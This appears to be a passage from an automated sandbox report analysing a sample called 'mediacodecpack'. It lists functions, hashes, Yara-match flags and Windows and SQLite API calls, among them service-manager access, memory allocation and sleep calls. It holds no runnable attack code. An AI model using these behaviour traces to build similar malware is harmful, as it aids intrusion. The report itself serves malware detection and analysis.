                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                • Instruction ID: 18e5a28a3b3dd855b8cfa4906261ab54779018c6ab8ca9ff62ca61d76da0e4fd
                                                                                • Opcode Fuzzy Hash: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                • Instruction Fuzzy Hash: 02A002215546019AD1483771AB4EB3839106701705F15417B7396750E34DB80186591F
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 1889721586-0
                                                                                • Opcode ID: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                • Instruction ID: 2654581188708fff4f1950a7e9f7eb320ae01a33822ca65d1bb5e0d43ee44f7c
                                                                                • Opcode Fuzzy Hash: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                • Instruction Fuzzy Hash: 24A022200000008ACBA02F880A8800C3000803A2003220838C00AF00A0EA30808CB20E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D38000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d38000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: d40964c7e3747278ea1569aff02c7ca133167a2a71c7c53ac2b567ec83d16ced
                                                                                • Instruction ID: c5c2b5d2f459e6cef4cefc4611ed52f6c1d98f12deb216d5be48caa454f9f741
                                                                                • Opcode Fuzzy Hash: d40964c7e3747278ea1569aff02c7ca133167a2a71c7c53ac2b567ec83d16ced
                                                                                • Instruction Fuzzy Hash: 67519EF2608600AFE7096E19DC9577EF7E9EF98724F16092EE6C583340EA3558408A97
                                                                                APIs
                                                                                  • Part of subcall function 02D10620: OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
                                                                                  • Part of subcall function 02D10620: CloseHandle.KERNEL32(00000000), ref: 02D106D5
                                                                                  • Part of subcall function 02D10620: ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
                                                                                  • Part of subcall function 02D10620: CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
                                                                                • TlsSetValue.KERNEL32(0000002B,?), ref: 02D111BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$OpenResetValue
                                                                                • String ID:
                                                                                • API String ID: 1556185888-0
                                                                                • Opcode ID: 76368609e87f110b4ab23b8e9a77792ff561a2b8ac1222fdd2bb3b60de6bec9a
                                                                                • Instruction ID: a134a51cbe72b17822560a94e70f949fa58d486f357d4dce6979ee36cd431d5e
                                                                                • Opcode Fuzzy Hash: 76368609e87f110b4ab23b8e9a77792ff561a2b8ac1222fdd2bb3b60de6bec9a
                                                                                • Instruction Fuzzy Hash: F3018F71A44254BBD710DF58ED05B5ABBA8EB05761F10462AF829D3780D735AD048AA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                • Instruction ID: 763a04054358afd8034bdf58efe23934774701223f643223d2c193f16d8f67d7
                                                                                • Opcode Fuzzy Hash: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                • Instruction Fuzzy Hash: 07D0C930C14028EFCB155B91E948CADFF71FB0C301B110067F481B65A1D33D4416BB15
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040D4FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                • Instruction ID: abf7d64f5ecc0974fd71cc89ec6167098742f4484bef6f8b47254da587dc98f1
                                                                                • Opcode Fuzzy Hash: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                • Instruction Fuzzy Hash: D3A0027298D640C7D18C2B906B0972535746F40701F36A03B9397744F19ABC364E7A5F
                                                                                APIs
                                                                                • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                • memcmp.MSVCRT ref: 60967D4C
                                                                                • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                • sqlite3_free.SQLITE3 ref: 60968002
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                • sqlite3_step.SQLITE3 ref: 60968139
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                  • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                  • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                  • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                  • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                • sqlite3_free.SQLITE3 ref: 60969102
                                                                                • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID: $d
                                                                                • API String ID: 2451604321-2084297493
                                                                                • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                APIs
                                                                                • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                • sqlite3_free.SQLITE3 ref: 60966183
                                                                                • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                • memcmp.MSVCRT ref: 6096639E
                                                                                  • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                  • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                • String ID: ASC$DESC$x
                                                                                • API String ID: 4082667235-1162196452
                                                                                • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                APIs
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                  • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                  • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                  • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                  • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                  • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                • String ID:
                                                                                • API String ID: 961572588-0
                                                                                • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                • String ID: 2$foreign key$indexed
                                                                                • API String ID: 4126863092-702264400
                                                                                • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_stricmp
                                                                                • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                • API String ID: 912767213-1308749736
                                                                                • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                APIs
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                • String ID:
                                                                                • API String ID: 4082478743-0
                                                                                • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                APIs
                                                                                  • Part of subcall function 02D08ADD: __EH_prolog.LIBCMT ref: 02D08AE2
                                                                                  • Part of subcall function 02D08ADD: _Allocate.LIBCPMT ref: 02D08B39
                                                                                  • Part of subcall function 02D08ADD: _memmove.LIBCMT ref: 02D08B90
                                                                                • _memset.LIBCMT ref: 02D0F949
                                                                                • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D0F9B2
                                                                                • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D0F9BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                • String ID: Unknown error$invalid string position
                                                                                • API String ID: 1854462395-1837348584
                                                                                • Opcode ID: d4625599a5a996c34edd25bfee29052e525d500d3a52e278ad9d07c387adb678
                                                                                • Instruction ID: f994d6c6845fa97007e5260010bb84a3575192df467ec9c462bb81a445ab6844
                                                                                • Opcode Fuzzy Hash: d4625599a5a996c34edd25bfee29052e525d500d3a52e278ad9d07c387adb678
                                                                                • Instruction Fuzzy Hash: 3F519D706083419FE724CF25C890B2EBBE4EB98744F64492DF49297BE1DB71E948CB52
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: BINARY$INTEGER
                                                                                • API String ID: 317512412-1676293250
                                                                                • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
